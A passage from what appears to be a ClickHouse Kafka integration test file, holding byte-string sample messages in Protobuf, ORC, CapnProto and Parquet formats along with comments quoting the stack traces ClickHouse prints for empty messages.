00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On an empty message this exception occurs: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On an empty message this exception occurs: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On an empty message this exception occurs: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f